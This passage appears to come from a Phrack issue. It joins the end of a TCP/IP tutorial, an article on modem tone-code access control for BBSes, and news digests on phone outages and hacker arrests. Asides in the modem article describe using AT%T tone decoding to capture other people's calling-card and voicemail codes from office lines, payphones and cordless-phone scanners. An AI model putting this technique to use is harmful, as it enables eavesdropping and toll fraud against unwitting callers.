|223.1.2 direct 1 | |223.1.3 indirect 223.1.2.4 1 | |223.1.4 indirect 223.1.2.4 1 | -------------------------------------------------------------------- TABLE 11. Alpha Route Table with Numbers The router in Alpha's route table is the IP address of delta's connection to the development network. 5.10 Indirect Scenario Alpha is sending an IP packet to epsilon. The IP packet is in alpha's IP module and the destination IP address is epsilon (223.1.3.2). IP extracts th network portion of this IP address (223.1.3) and scans the first column of the table looking for a match. A match is found on the second entry. This entry indicates that computers on the 223.1.3 network can be reached through the IP-router devnetrouter. Alpha's IP module then does an ARP table translation for devnetrouter's IP address and sends the IP packet directly to devnetrouter through Alpha's interface number 1. The IP packet still contains the destination address of epsilon. The IP packet arrives at delta's development network interface and is passed up to delta's IP module. The destination IP address is examined and because it does not match any of delta's own IP addresses, delta decides to forward the IP packet. Delta's IP module extracts the network portion of the destination IP address (223.1.3) and scans its route table for a matching network field. Delta's route table looks like this: ---------------------------------------------------------------------- |network direct/indirect flag router interface number| ---------------------------------------------------------------------- |development direct 1 | |factory direct 3 | |accounting direct 2 | ---------------------------------------------------------------------- TABLE 12. Delta's Route Table Below is delta's table printed again, without the translation to names. ---------------------------------------------------------------------- |network direct/indirect flag router interface number| ---------------------------------------------------------------------- |223.1.2 direct 1 | |223.1.3 direct 3 | |223.1.4 direct 2 | ---------------------------------------------------------------------- TABLE 13. Delta's Route Table with Numbers The match is found on the second entry. IP then sends the IP packet directly to epsilon through interface number 3. The IP packet contains the IP destination address of epsilon and the Ethernet destination address of epsilon. The IP packet arrives at epsilon and is passed up to epsilon's IP module. The destination IP address is examined and found to match with epsilon's IP address, so the IP packet is passed to the upper protocol layer. 5.11 Routing Summary When a IP packet travels through a large internet it may go through many IP-routers before it reaches its destination. The path it takes is not determined by a central source but is a result of consulting each of the routing tables used in the journey. Each computer defines only the next hop in the journey and relies on that computer to send the IP packet on its way. 5.12 Managing the Routes Maintaining correct routing tables on all computers in a large internet is a difficult task; network configuration is being modified constantly by the network managers to meet changing needs. Mistakes in routing tables can block communication in ways that are excruciatingly tedious to diagnose. Keeping a simple network configuration goes a long way towards making a reliable internet. For instance, the most straightforward method of assigning IP networks to Ethernet is to assign a single IP network number to each Ethernet. Help is also available from certain protocols and network applications. ICMP (Internet Control Message Protocol) can report some routing problems. For small networks the route table is filled manually on each computer by the network administrator. For larger networks the network administrator automates this manual operation with a routing protocol to distribute routes throughout a network. When a computer is moved from one IP network to another, its IP address must change. When a computer is removed from an IP network its old address becomes invalid. These changes require frequent updates to the "hosts" file. This flat file can become difficult to maintain for even medium-size networks. The Domain Name System helps solve these problems. 6. User Datagram Protocol UDP is one of the two main protocols to reside on top of IP. It offers service to the user's network applications. Example network applications that use UDP are: Network File System (NFS) and Simple Network Management Protocol (SNMP). The service is little more than an interface to IP. UDP is a connectionless datagram delivery service that does not guarantee delivery. UDP does not maintain an end-to-end connection with the remote UDP module; it merely pushes the datagram out on the net and accepts incoming datagrams off the net. UDP adds two values to what is provided by IP. One is the multiplexing of information between applications based on port number. The other is a checksum to check the integrity of the data. 6.1 Ports How does a client on one computer reach the server on another? The path of communication between an application and UDP is through UDP ports. These ports are numbered, beginning with zero. An application that is offering service (the server) waits for messages to come in on a specific port dedicated to that service. The server waits patiently for any client to request service. For instance, the SNMP server, called an SNMP agent, always waits on port 161. There can be only one SNMP agent per computer because there is only one UDP port number 161. This port number is well known; it is a fixed number, an internet assigned number. If an SNMP client wants service, it sends its request to port number 161 of UDP on the destination computer. When an application sends data out through UDP it arrives at the far end as a single unit. For example, if an application does 5 writes to the UDP port, the application at the far end will do 5 reads from the UDP port. Also, the size of each write matches the size of each read. UDP preserves the message boundary defined by the application. It never joins two application messages together, or divides a single application message into parts. 6.2 Checksum An incoming IP packet with an IP header type field indicating "UDP" is passed up to the UDP module by IP. When the UDP module receives the UDP datagram from IP it examines the UDP checksum. If the checksum is zero, it means that checksum was not calculated by the sender and can be ignored. Thus the sending computer's UDP module may or may not generate checksums. If Ethernet is the only network between the 2 UDP modules communicating, then you may not need checksumming. However, it is recommended that checksum generation always be enabled because at some point in the future a route table change may send the data across less reliable media. If the checksum is valid (or zero), the destination port number is examined and if an application is bound to that port, an application message is queued for the application to read. Otherwise the UDP datagram is discarded. If the incoming UDP datagrams arrive faster than the application can read them and if the queue fills to a maximum value, UDP datagrams are discarded by UDP. UDP will continue to discard UDP datagrams until there is space in the queue. 7. Transmission Control Protocol TCP provides a different service than UDP. TCP offers a connection- oriented byte stream, instead of a connectionless datagram delivery service. TCP guarantees delivery, whereas UDP does not. TCP is used by network applications that require guaranteed delivery and cannot be bothered with doing time-outs and retransmissions. The two most typical network applications that use TCP are File Transfer Protocol (FTP) and the TELNET. Other popular TCP network applications include X-Window System, rcp (remote copy), and the r- series commands. TCP's greater capability is not without cost: it requires more CPU and network bandwidth. The internals of the TCP module are much more complicated than those in a UDP module. Similar to UDP, network applications connect to TCP ports. Well- defined port numbers are dedicated to specific applications. For instance, the TELNET server uses port number 23. The TELNET client can find the server simply by connecting to port 23 of TCP on the specified computer. When the application first starts using TCP, the TCP module on the client's computer and the TCP module on the server's computer start communicating with each other. These two end-point TCP modules contain state information that defines a virtual circuit. This virtual circuit consumes resources in both TCP end-points. The virtual circuit is full duplex; data can go in both directions simultaneously. The application writes data to the TCP port, the data traverses the network and is read by the application at the far end. As with all sliding window protocols, the protocol has a window size. The window size determines the amount of data that can be transmitted before an acknowledgement is required. For TCP, this amount is not a number of TCP segments but a number of bytes. 8. Network Appliations Why do both TCP and UDP exist, instead of just one or the other? They supply different services. Most applications are implemented to use only one or the other. You, the programmer, choose the protocol that best meets your needs. If you need a reliable stream delivery service, TCP might be best. If you need a datagram service, UDP might be best. If you need efficiency over long-haul circuits, TCP might be best. If you need efficiency over fast networks with short latency, UDP might be best. If your needs do not fall nicely into these categories, then the "best" choice is unclear. However, applications can make up for deficiencies in the choice. For instance if you choose UDP and you need reliability, then the application must provide reliability. If you choose TCP and you need a record oriented service, then the application must insert markers in the byte stream to delimit records. What network aplications are available? There are far too many to list. The number is growing continually. Some of the applications have existed since the beginning of internet technology: TELNET and FTP. Others are relatively new: X-Windows and SNMP. The following is a brief description of the applications mentioned in this tutorial. 8.1 TELNET TELNET provides a remote login capability on TCP. The operation and appearance is similar to keyboard dialing through a telephone switch. On the command line the user types "telnet delta" and receives a login prompt from the computer called "delta". TELNET works well; it is an old application and has widespread interoperability. Implementations of TELNET usually work between different operating systems. For instance, a TELNET client may be on VAX/VMS and the server on UNIX System V. 8.2 FTP File Transfer Protocol (FTP), as old as TELNET, also uses TCP and has widespread interoperability. The operation and appearance is as if you TELNETed to the remote computer. But instead of typing your usual commands, you have to make do with a short list of commands for directory listings and the like. FTP commands allow you to copy files between computers. 8.3 rsh Remote shell (rsh or remsh) is one of an entire family of remote UNIX style commands. The UNIX copy command, cp, becomes rcp. The UNIX "who is logged in" command, who, becomes rwho. The list continues and is referred to collectively to as the "r" series commands or the "r*" (r star) commands. The r* commands mainly work between UNIX systems and are designed for interaction between trusted hosts. Little consideration is given to security, but they provide a convenient user environment. To execute the "cc file.c" command on a remote computer called delta, type "rsh delta cc file.c". To copy the "file.c" file to delta, type "rcp file.c delta:". To login to delta, type "rlogin delta", and if you administered the computers in a certain wa, you will not be challenged with a password prompt. 8.4 NFS Network File System, first developed by Sun Microsystems Inc, uses UDP and is excellent for mounting UNIX file systems on multiple computers. A diskless workstation can access its server's hard disk as if the disk were local to the workstation. A single disk copy of a database on mainframe "alpha" can also be used by mainframe "beta" if the database's file system is NFS mounted commands to use the NFS mounted disk as if it were local disk. 8.5 SNMP Simple Network Management Protocol (SNMP) uses UDP and is designed for use by central network management stations. It is a well known fact that if given enough data, a network manager can detect and diagnose network problems. The central station uses SNMP to collect this data from other computers on the network. SNMP defines the format for the data; it is left to the central station or network manager to interpret the data. 8.6 X-Window The X Window System uses the X Window protocol on TCP to draw windows on a workstation's bitmap display. X Window is much more than a utility for drawing windows; it is entire philosophy for designing a user interface. 9. Other Information Much information about internet technology was not included in this tutorial. This section lists information that is considered the next level of detail for the reader who wishes to learn more. o administration commands: arp, route, and netstat o ARP: permanent entry, publish entry, time-out entry, spoofing o IP route table: host entry, default gateway, subnets o IP: time-to-live counter, fragmentation, ICMP o RIP, routing loops o Domain Name System 10. References [1] Comer, D., "Internetworking with TCP/IP Principles, Protocols, and Architecture", Prentice Hall, Englewood Cliffs, New Jersey, U.S.A., 1988. [2] Feinler, E., et al, DDN Protocol Handbook, Volume 2 and 3, DDN Network Information Center, SRI International, 333 Ravenswood Avenue, Room EJ291, Menlow Park, California, U.S.A., 1985. [3] Spider Systems, Ltd., "Packets and Protocols", Spider Systems Ltd., Stanwell Street, Edinburgh, U.K. EH6 5NG, 1990. 11. Relation to other RFCs This RFC is a tutorial and it does not UPDATE or OBSOLETE any other RFC. 12. Security Considerations There are security considerations within the TCP/IP protocol suite. To some people these considerations are serious problems, to others they are not; it depends on the user requirements. This tutorial does not discuss these issues, but if you want to learn more you should start with the topic of ARP-spoofing, then use the "Security Considerations" section of RFC 1122 to lead you to more information. 13. Authors' Addresses Theodore John Socolofsky EMail: TEDS@SPIDER.CO.UK Claudia Jeanne Kale EMail: CLAUDIAK@SPIDER.CO.UK Note: This info taken from RFC-1180. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-four, File #9 of 11 ._._._._._._._._._._._._._._._._._._._._._._._._. ! ! ! Advanced Modem-Oriented BBS Security ! ! ! ! By Laughing Gas and Dead Cow ! ! ! ! Written Exclusively for PHRACK 8/22/91 ! !_._._._._._._._._._._._._._._._._._._._._._._._! * Introduction =-= Things you need to know * This is an introduction and guide to setting up your BBS and modem so that a caller must know a certain code and append it to his dialing string in order to access the BBS. This lets you have yet another way (besides newuser passwords, etc) to lock out unwanted callers. You can also set a certain pattern for your board's numerical code based on the day or the month or something, and distribute this pattern instead of having to distribute the access code. You must have an intelligent modem to be able to run a board which requires the access method I'm going to be discussing in this file. However you don't need an intelligent modem to be able to call the same board, but you do have to enter the code manually if you do not have an intelligent modem. (So only certain people can run a board with this method of access control, but >almost< anyone can call one.) All modem commands in this manual will be hayes 'AT' style commands, and some may be available only to USRobotics Courier modems with v.42bis, or certain other intelligent modems. If you can't get it to work with your modem, your modem may not be able to do it, but try looking in your modem manual, just in case. NOTE: The ONLY modem that this method has been tested with is a USRobotics Courier HST modem, (the new kind) with the v.42bis. I tested it with my modem which is an older HST (14.4, but no v.42bis) and it did NOT accept the AT%T command (it returned "ERROR"). Check page 83 of your HST manual for more info, or type AT%$ for on-line help from the modem firmware. (about as helpful as the manual, and neither are very detailed.) Things to know: ATDT1234567; This command causes your modem to dial 1234567 and then return to command mode. ATDT1234567@1; This command causes your modem to dial 1234567, wait for an answer, dial 1 and return to command mode. |-----> AT%T This command causes every tone that goes into the modem | to be identified and followed with a 0. | |---------------------- This is the key to the whole enchilada. Alternate commands may be available depending on your modem type. * Concept =-= How-To The concept for the bbs access code would be as follows. The caller dials the number to the BBS, when the BBS picks up, it sends a digit, then the caller sends a responding set of digits. If the digits which the caller sends match the access code for the BBS, the BBS will send an answer tone and the caller's modem will acknowledge and connection. How it works is like this: (Sample Transcript) CALLER> ATDT1234567@234 BBS> RING BBS> ATDT1; BBS> OK BBS> AT%T BBS> 203040 BBS> ATA What happens is the caller dials 1234567 (the number of the BBS) the '@' tells the callers modem to wait for a result (which is received when the BBS gets a ring and sends a 1) then the callers modem dials 234 (the access code) after the BBS sent the '1' it got a OK so it sent a AT%T which told it to monitor tones. This command returned "203040" which is 234 followed by 0's (the format of the output of AT%T) the BBS software would have to watch for this string. Since 234 was the right code, the board sent an ATA which would connect the caller since it's dial command was still open. If 234 hadn't been the code, then the BBS would have sent a ATH0. * Manual Dialing =-= Lame modems * Anyway, if you don't have a modem that does the AT%T or ATDT1; commands you CANNOT run a BBS with this type of security, unless your modem has EQUIVALENT commands, or you can figure out a way to do it with the commands your modem has. The toughest part is the reading of tones, which, as far as I know, is unique to the HST/Courier modems. However, if your modem does not do the ATDT1@1 thing, then you can PROBABLY still call a board using this security. This is assuming you can just send a "dial command" to your modem without a number (ie ATD on an HST.) What you do is dial the BBS number manually, then you'll here a beep, you dial the code, then send the dial command to your modem and put the phone down. This should connect you in the same fashion.. (ie..) CALLER> manually dials BBS BBS> ATDT1; CALLER> hears beep and dials 234, then sends ATD to his modem and puts the phone down. BBS> OK BBS> AT%T BBS> 203040 BBS> ATA CALLER> his modem connects. * Bells and Whistles =-= Wrapping It Up * Your options when using this type of security. There are many different things you can do. Method #1: You can say "Hey, the access code for my board is 234" and give that to the people you want to call. Method #2: Set a pattern for your access codes. Say, the date (ie, for today, 8-22-91 the code would be 082291), or you could get more complex (add one to each digit, run it through an algorithm, etc) Method #3: Distribute a program that generates the code based on the day, the month, what have you. (However this is only a solution if you can either distribute a program like this to EVERY type of operating system, or you only want callers from one operating system (or several, the only ones you can produce it for..) Method #4: Have the BBS accept several codes, and give out different code to each class of users (say, newusers to apply = 1234, validated = 2345, elite = 3456) or something like that, this would allow for control of who calls when, as well as logging of call class frequency, etc. Method #5: Have a specific code for each user. This would take a lot of maintenance, but would provide for a VERY secure BBS environment. This would allow the same advantages above as well (logging, freq. etc). Things to keep in mind however are if you have an access code generated by a program or by the date, etc. you have to change the code whenever the program would. An interesting side note here is that the AT%T command can be used to call a COCOT (private payfone) and record the tones, or possibly to record codes other people entered, etc. (Ie, bring your laptop with modem to a office, attach it to an extension and wait for a person to pick up, issue the ATD; command right away, then AT%T command. If the person dials a 950, you should get something like 90500010003030 (pause) 203040506070 that is assuming the code is 234567. Congratulations, you now have their code. The modem can recognize the dtmf tones for 0-9, *, #, and the silver box tones A, B, C, and E. I'm sure other interesting uses for this feature can be found, and I'd love to hear from the other people out there in the h/p world. I'm sure a lot of you have seen me around, for those that haven't I can be reached on my board, Solsbury Hill or Ripco (312) or on Internet as lgas@doomsday.spies.com. (Note: Spies is down as of this writing, I have some other accounts, but I'd prefer that most of them remain unknown... if anyone wants to offer me an account I can use just for mail where I can have my alias for the account name, on a stable system, please contact me.) * Non-BBS Oriented Stuff =-= Conclusion * In some issue of 2600 magazine someplace at some time they published an article on how to build a tone detection device: Now you have your own, built in to the modem. An example application of this "in the field" would be calling a COCOT and using the modem to decipher the tones. That would be done: ATDT3014283268; ;call the COCOT AT%T ;get tones it should respond with the decoded tones. You could fool around with it and get it to accept input from a tape recorder, this gives you a way to decipher recorded VMB passcodes, or phone numbers, or anything else that was recorded as it was dialed. Or use it with a radio scanner set to scan the freqs that cordless fones operate on, and record those tones. Then play 'em back into the modem and they're yours. In conclusion... (ahem).. This is an area which I believe has never been breached before, and this idea was brought to you by THUGS. As long as technology keeps advancing, we'll be here to bring you the latest tricks such as this one. Please contact me if you have any information about this area (tone detection via modem, or anything relating to it at all..) especially if you know of modems besides the v.42bis models of USRobotic's HSTs that can do this. Laughing Gas Solsbury Hill BBS (301-428-3268) _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-Four, File #10 of 11 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Issue XXXIV / Part One PWN PWN PWN PWN Compiled by Dispater PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN What We Have Got Here Today is Failure to Communicate ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Editors Comment: Dispater With hundreds, maybe thousands of lives at stake, three airports in New York had to shut down due to a long distance carrier failing. It is absolutely amazing how irresponsible these services were to rely on only on form of communication. Where was the back up system? This incident might not have happened it they would have had an alternative carrier or something as simple as two way radios. Many people are running around these days screaming about how irresponsible AT&T was. The real problem lyes with people in our society failing to take the time to learn fundamental aspects of the common technology. It is also a shame that the people "in control" were incapable of using something as simple as a "port" to dial through another extender. This is the kind of thing that happens when people choose to isolate themselves from the technological society we have today. What follows is a compilation of several articles dealing with AT&T long distance carrier failures. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Thank You for abUsing AT&T October 18, 1991 ~~~~~~~~~~~~~~~~~~~~~~~~~ by Kimberly Hayes Taylor and Steve Marshall (USA Today "Phone Failure Stalls Air Traffic Disruption in N.Y. Felt Nationwide") Air traffic in and out of New York City resumed late Tuesday after a phone-service failure virtually shut down three airports for almost four hours. Hundreds of flights coast to coast were delayed or canceled when controllers at John F. Kennedy, La Guardia and Newark (New Jersey) airports lost the link that allows communication among themselves or with other U.S. airports. Communications between pilots and air-traffic controllers travel over telephone lines to ground-based radio equipment. AT&T spokesman Herb Linnen blamed an internal power failure in a long-distance switching office in Manhattan. Hours after the 4:50 PM EDT failure, 40 planes loaded with passengers were sitting on the runway at Kennedy, 35 at Newark, 30 at La Guardia. "During the height of the thing, at least 300 aircraft were delayed at metropolitan airports," said Bob Fulton, a spokesperson for the Federal Aviation Administration. Included: flights taking off "from California to Florida" and headed for New York, said FAA's Fred Farrar. Farrar said planes had to be grounded for safety. Without telephone communication, they would "fly willy-nilly." Among diverted flights: a British Airways supersonic Concorde from London, which landed at Bradley airport outside Hartford, Conn. Passenger reaction: at Washington's National Airport, Dominique Becoeur of Paris was "reading, drinking, and thinking" while waiting for a flight to New York. At La Guardia, Ernie Baugh, of Chattanooga, Tenn., said, "I think I will go and have another beer." Flights were reported resuming by 9 p.m. EDT. Linnen said AT&T was busy Tuesday night restoring long-distance service in and out of New York City, which had been interrupted. Some international service also had been affected. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - AT&T's Hang Ups October 19, 1991 ~~~~~~~~~~~~~~ By John Schneidawind (USA Today - "The Big Hang-Up Phone Crash Grounds Airplanes, Raises Anger") The Federal Administration Aviation has some good news for travelers who were stranded at airports, or delayed for hours, the past two days by the New York City telephone outage. If a similar phone disaster strikes next month, hardly any fliers will know the difference. That's because AT&T is close to completing installation of a network of microwave dishes that will supplement, if not replace, the phone lines AT&T uses to relay calls between air-traffic controllers in different cities. Tuesday evening, flights in and out of some of the nation's busiest airports - Kennedy, La Guardia, and Newark, N.J. - were grounded because FAA controllers couldn't communicate with one another. For much of the 1980's, land-based fiber optic lines have been slowly replacing microwave phone dishes phone companies long have used to transmit telephone calls. That's because fiber-optic wires were thought to provide clearer calls than microwave technology. Now, it's becoming apparent that sending some or most telephone calls via wireless microwave might ease the burden handled by fiber-optic cables. In addition, a microwave call could be transmitted point-to-point, bypassing an inoperative switching center when a breakdown or catastrophe occurs. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Computer Maker Says Tiny Software Flaw Caused Phone Disruptions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Edmund L Andrews (New York Times) WASHINGTON -- A manufacturer of telephone call-routing computers said that a defect in three or four lines of computer code, rather than a hacker or a computer "virus," appeared to be the culprit behind a mysterious spate of breakdowns that disrupted local telephone service for 10 million customers around the country in late June and early this month. In congressional testimony Tuesday, an official of the manufacturer, DSC Communications of Plano, Texas, said all the problems had been traced to recent upgrades in its software, which had not been thoroughly tested for hidden "bugs." Although the telephone companies that experienced failures were using slightly different versions of the software, the company said, each version was infected with the flaw. "Our equipment was without question a major contributor to the disruptions," Frank Perpiglia, DSC's vice president for technology and product development, told the House telecommunications subcommittee. "We must be forthright in accepting responsibility for failure." Officials at both DSC and the regional Bell companies said they could not entirely rule out the possibility of sabotage, but said the evidence points strongly to unintentional errors. The flaws caused the computers to send a flood of erroneous messages when the computer encountered routine maintenance problems. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - TELEPHONE TECHNOLOGY QUESTIONED AFTER FAILURES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Edmund L. Andrew (New York Times) WASHINGTON -- Striking similarities between nearly simultaneous computer malfunctions that disrupted local telephone service on the East Coast and in Los Angeles on Wednesday have raised questions among communications experts about the reliability of advanced networks that all the Bell telephone companies are now installing. The problems experienced by both Pacific Bell and the Chesapeake and Potomac Co., which serves Washington, Maryland, Virginia and parts of West Virginia, involved computer programs on advanced call-routing equipment, which uses the same new technology, one being adopted throughout the communications industry. The problems, which were corrected in both areas by early evening on Wednesday, made it impossible for about nine million telephone customers to complete local telephone calls. Although the origins of both malfunctions remained unclear on Thursday, the difficulties at the two companies bore a strong resemblance to a brief but massive breakdown experienced by the American Telephone and Telegraph Co.'s long-distance lines in January 1990. In all three cases, a problem at one switching center quickly corrupted other switches and paralyzed much of the system. Perhaps the biggest fear, federal regulators say, is that as telephone companies link their networks more closely, malfunctions at one company can infect systems at other companies and at long-distance carriers. "What you want to avoid is the situation where one system contaminates another," said an investigator at the Federal Communications Commission who insisted on anonymity. "I guess the ultimate concern is that software or hardware would be deployed in a way that the corruption could be processed through entire network, and there would be no alternatives available." As the telephone companies and government regulators tried to determine more precisely on Thursday what went wrong, investigators at the communications commission said they would also look at several other questions: Are there system wide problems that have gone unnoticed until now? Can telephone companies reduce risks by reducing their dependence on one type of switching equipment? Were the disruptions caused by computer operators outside the telephone companies trying to sabotage the systems? Officials at both companies discounted the possibility that a computer hacker might have caused the failures, and outside experts tended to agree. "There's always that possibility, but most likely it was some kind of glitch or bug in the software," said A. Michael Noll, a professor at the Annenberg School of Communications at the University of Southern California and author of several textbooks on telecommunications technology. Several independent communications experts said the problems reflected the difficulty of spotting all the hidden problems in complex software before putting it into commercial use. "It's very hard to simulate all the possibilities in a laboratory," said Richard Jay Solomon, a telecommunications consultant and research associate at the Massachusetts Institute of Technology. "You have to go out in the field and keep your fingers crossed." As more information became available on Thursday, the two disruptions appeared to be almost identical. The problem at Chesapeake & Potomac, a subsidiary of the Bell Atlantic Corp., began as the company was increasing the traffic being routed by one of its four signal processing computers. For reasons that remain a mystery, the system began to malfunction about 11:40 a.m. The computer was supposed to shut itself down, allowing the traffic to be handled by other computers. Instead, it sent out a barrage of erroneous signals, apparently overwhelming the other two computers. "It was as if bogus information was being sent," said Edward Stanley, a company spokesman. The same thing seems to have occurred almost two hours later, at about 11 a.m., in Los Angeles, said Paul Hirsch, a spokesman for Pacific Bell, a subsidiary of the Pacific Telesis Group. Hirsch said the problem began when one of four signal transfer points signaled to the others that it was having problems. The other three computers froze after being overloaded by signals the defective computer. Hirsch said his company continued to believe that the two telephone incidents were completely unrelated. "Someone wins the lottery every week," he said. "Stranger things can happen." Officials at Chesapeake and Potomac said the problems were probably unrelated. Asked if hackers could have caused the problems, Ellen Fitzgerald, a spokeswoman for Chesapeake and Potomac, said she had been assured that the system could not be penetrated. But, she added, "a few days ago I would have told you that what happened yesterday wouldn't happen." Terry Adams, a spokesman at the DSC Communications Corp., which made both systems, said company officials also discounted any connection between the failures. ______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue Thirty-four, File #11 of 11 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Phrack World News PWN PWN PWN PWN Issue XXXIV, Part Two PWN PWN PWN PWN Compiled by Dispater PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Mind Rape or Media Rape? ~~~~~~~~~~~~~~~~~~~~~~~ Special Thanks: Night Ranger Thursday September 26, 1991 was no ordinary day for Mind Rape, a young Arizona State college student. When he finally made it home that day, he found his home had been raided by the feds. 'They took EVERYTHING! Including my Metallica tape!' he told me. After talking to him for quite a while I learned a lot, not just about his bust but about hacking in general. He instructed me not to say anything specifically on the advice of his lawyer and the EFF, but he did want me to let the real reason he was busted be known - His electronic newsletter entitled NSA (for National Security Anarchists). Mind Rape has some very important views on hacking that the government doesn't want others to hear. Some of these views were contained in his newest and soon to be released newsletter NSA issue number five, which was confiscated of course. He was also working on a book about hacker's philosophy, which was taken too. He has not yet been charged but in the eyes of the media he is already been tried and found guilty. It is unfortunate the general public gets its information from news reports like the following because, as you can see, they can be quite misleading. Hopefully once Mind Rape gets everything straight he will continue to write his book, after all it is his constitutional right to do so, and I think it be quite informative to both the hackers of the nineties and the outside world. The following is a transcript of a news report covering his story... - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Male Announcer: That student is Donald _____ of Phoenix. Officials of LDL Long Distance believe he's one of around 20 hackers who've been ripping off their company for fun and profit. In tonight's Night Team Report we'll see how this kind of thievery adds up. The nation's telephone companies loose more than a billion dollars a year to hackers. Mark Nighten (sp?) a security director for LDL Long Distance. Last month he was poring through records like these which convinced him to believe that someone was making hundreds of computer generated phone calls to his company's 1-800 access line trying to get customer's calling card codes. He went to the Phoenix Police. They got a search warrant and traced the calls to a house near 18th Drive near Union Hills. Police went there last month and came away with a computer, software and a list of phone codes, all belonging to 19 year old Donald _____ an ASU student. With nighten suspects _____ is just one of 20 hacker on his network who can make thousands of dollars worth of calls which would wind up on other people's phone bills. Mark: You can see the magnitude of this. Off of one authorization code you could have 10, maybe 150 other people... Male Announcer: Lemme ask ya...How bad are you getting ripped off here? Mark: We've had to have somebody on this 24 hours a day. We've been getting killed. Male Announcer: Hackers often sell the codes they steal to other students. So that hundreds of students and Arizona State University and University of Arizona also could be ripping of the company. Students at Arizona State University told me today that they have not herd of LDL's troubles, but they confirmed that stolen phone codes do have a way of getting around. I iz a College Student: Someone hears...ya know...about the interest and someone else knows somebody...ya know...and they tell you and you talk to them and...ya know...it's not overly expensive or anything like that. Male Announcer: Dr. Dan Kneer of Arizona State University's School of Business is a nationally recognized expert on computer crime. [who?] He contends that hacking is mushrooming. Dr. Dan: The problem that I see is that these people philosophically don't see this as a crime. For most of them this is an intellectual challenge. Male Announcer: That challenge led Dutch students to break into a United States Army Computer during operation desert storm. And as this Japanese documentary shows, it led hackers in a New York City to use payphones to commit big time rip-offs. Now it's important to point out that Donald ______, that Arizona State University student, has not yet been charged with any crime and if he is charged he is innocent until proven guilty. Female announcer: What is the penalty for hacking? Male Announcer: Just for getting into a system when you're not supposed to can be up to a year and a half in prison. But if there is criminal intent to steal, to rip-off that system, the penalty can be as high as 10 years in jail and a $150,000.00 fine. _______________________________________________________________________________ Computer Hacker Gets Probation September 26, 1991 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Special Thanks: Flaming Carrot (Pittsburgh Post-Gazette) A Mt. Lebanon woman who was able to make thousands of free long-distance telephone calls by breaking into voice mail boxes with a touch tone telephone has been placed on 10 years probation. Last Friday, Common Pleas Judge Robert E. Dauer ordered Andrea Gerulis, 20, of Castle Shannon Boulevard to make restitution of $4,300 to Magee Womens Hospital and $2,516 to Pittsburgh Cellular Telephone Co. Gerulis, a Mt. Lebanon High School graduate, was a computer hacker who entered telephone computer systems illegally so that she could make telephone calls without paying for the service. Mt. Lebanon police Detective John L. Michalec posed as a computer hacker and spent nine months investigating her activities, which were done by dialing codes on a touch-tone telephone. After a non-jury trial in May, Dauer convicted her of two counts of theft of services and two counts of unlawful use of computers. Assistant District Attorney Thaddeus A. Dutkowski recommended probation because he didn't want Gerulis to go to jail, where she could teach inmates how to commit crimes with a telephone. If she were incarcerated, she would have the largest classroom environment she could hope for, Dutkowski said. Dauer agreed that inmates already know too much about committing crimes with telephones. Gerulis told Dauer that she was sorry for what she did, that when she started, she was doing it for fun. She was also ordered to continue psychological counseling. _______________________________________________________________________________ More Archaic Government Regulations Proposed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Special Thanks: Stainless Steal Provider (New York Times) The federal government said Thursday that it would introduce a standard for authenticating electronic data later this summer, but the announcement prompted an angry reaction from one of the leading private providers of software that protects computer data. The company, RSA Data Security Inc. of Redwood City, Calif., said the government had failed to address fears about the possibility of a secret "trap door," which would permit intelligence and law-enforcement agencies to look at private data. The issue of providing special mechanisms to permit government access to private information has caused a growing public debate recently. Earlier this year an anti-terrorism bill introduced in Congress called on the computer and telecommunication industries to permit federal agencies to look at private data. But the statement was later dropped from the bill after extensive public opposition. Government officials said that it would be possible for technical experts to examine the standard when it is released this summer and they could decide for themselves whether there were any shortcomings in the design of the standard. "It will be openly published and people can inspect it to their heart's content," said James H. Burrows, head of the computer systems laboratory at the National Institute of Standards and Technology. He added that the new standard was not intended to encrypt computer data, and that the government would continue to rely on an earlier technology known as the Data Encryption Standard to actually hide information from potential electronic eavesdroppers. Burrows said there was a project under way to develop a successor to that standard, but that it was years away from completion. ______________________________________________________________________________ Computer Whiz Accused Of Illegal Access and Mischief September 25, 1991 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ by Peter G. Chronis (The Denver Post Page 1 "NASA vs. Hobbyist") An Aurora computer hobbyist who allegedly used a personal computer and his home phone to penetrate NASA computers hacked off Uncle Sam enough to be indicted on seven federal counts yesterday. Richard G. Wittman, 24, the alleged "hacker," was accused of two felonies, including gaining unauthorized access to NASA computers to alter, damage, or destroy information, and five misdemeanor counts of interfering with the government's operation of the computers. Wittman allegedly got into the NASA system on March 7, June 11, June 19, June 28, July 25, July 30, and Aug. 2, 1. Bob Pence, FBI chief in Denver, said Wittman used a personal computer in his home and gained access to the NASA systems over telephone lines. The investigation, which took more than a year, concluded that Wittman accessed the NASA computer system and agency computers at the Marshall Space flight Center in Huntsville, Alabama, and the Goddard Space Flight Center in Greenbelt, Maryland. The NASA computers are linked to a system called Telenet, which allows qualified people to access government data bases. A user name and password are required to reach the NASA computers. Federal sources declined to reveal more information because the complex case involves "sensitive material." Wittman, a high-school graduate, apparently hadn't worked in the computer industry and held a series of odd jobs. The felony counts against him each carry a possible five-year prison term and $250,000 fine. _______________________________________________________________________________ Security Increases ~~~~~~~~~~~~~~~~~ Special Thanks: Stainless Steal Provider (New York 